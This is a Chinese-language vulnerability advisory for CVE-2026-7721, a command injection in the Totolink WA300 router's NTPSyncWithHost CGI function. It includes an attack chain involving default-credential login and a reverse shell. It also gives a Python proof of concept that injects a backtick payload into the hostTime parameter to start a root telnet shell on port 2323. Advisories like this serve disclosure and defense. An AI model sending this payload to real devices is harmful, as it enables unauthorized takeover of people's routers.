CVE-2026-7721 CVSS 6.3 中危

CVE-2026-7721 Totolink WA300 命令注入漏洞

披露日期: 2026-05-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7721

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink WA300

漏洞概述

Totolink WA300路由器存在命令注入漏洞。该漏洞源于`/cgi-bin/cstecgi.cgi`文件中的`NTPSyncWithHost`函数未正确过滤`hostTime`参数。攻击者通过构造恶意请求可执行任意系统命令，需低权限即可利用。

技术细节

该漏洞位于Totolink WA300路由器的Web管理接口。受影响组件为`/cgi-bin/cstecgi.cgi`脚本中的`NTPSyncWithHost`函数。该函数在处理NTP同步请求时，直接将用户提交的`hostTime`参数拼接到系统命令中执行，且未进行有效的输入验证和过滤。攻击者可在经过低权限认证后，利用Shell元字符（如分号或反引号）注入恶意命令。由于服务通常以Root权限运行，成功利用可导致设备被完全接管，造成信息泄露或服务中断。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出目标设备为Totolink WA300路由器，并确定其Web管理接口的IP地址。

STEP 2

2. 获取认证

由于漏洞利用需要低权限（PR:L），攻击者通过暴力破解或使用默认凭证登录路由器后台，获取有效的会话Cookie。

STEP 3

3. 漏洞利用

攻击者向`/cgi-bin/cstecgi.cgi`发送特制的POST请求，在`hostTime`参数中注入恶意的Shell命令（如启动Telnet服务）。

STEP 4

4. 命令执行

服务器端CGI脚本未过滤参数，直接将注入的字符串传递给系统Shell执行，从而在设备上运行攻击者的命令。

STEP 5

5. 建立控制

攻击者连接回弹的Shell或开启的后门，获取路由器的Root权限，完全控制设备流量。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual IP)
target_url = "http://192.168.1.1/cgi-bin/cstecgi.cgi"

# Attacker's session cookie (required due to PR:L)
cookies = {
    "Cookie": "uid=123456; "
}

# Malicious payload to inject command (e.g., telnetd or ping)
# Using backticks or semicolon to break the original command
injected_cmd = "`telnetd -p 2323 -l /bin/sh`"

# Construct the POST data
data = {
    "function": "set",
    "action": "NTPSyncWithHost",
    "hostTime": injected_cmd
}

try:
    # Send the exploit request
    response = requests.post(target_url, json=data, cookies=cookies, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Failed to send request. Status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Totolink WA300 5.2cu.7112_B20190227

防御指南

临时缓解措施

如果无法立即升级固件，建议暂时禁用路由器的远程Web管理功能，并仅允许受信任的内网IP访问管理后台。同时，应通过ACL规则限制对`/cgi-bin/`路径的访问请求，以阻断针对该接口的攻击尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7721
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7721
3 Details https://www.cvedetails.com/cve/CVE-2026-7721/
4 VulDB https://vuldb.com/cve/CVE-2026-7721
5 Link https://lavender-bicycle-a5a.notion.site/TOTOLINK-WA300-NTPSyncWithHost-34553a41781f80808f3cfd14e1c603e7
6 Link https://vuldb.com/submit/807199
7 Link https://vuldb.com/vuln/360897
8 Link https://vuldb.com/vuln/360897/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表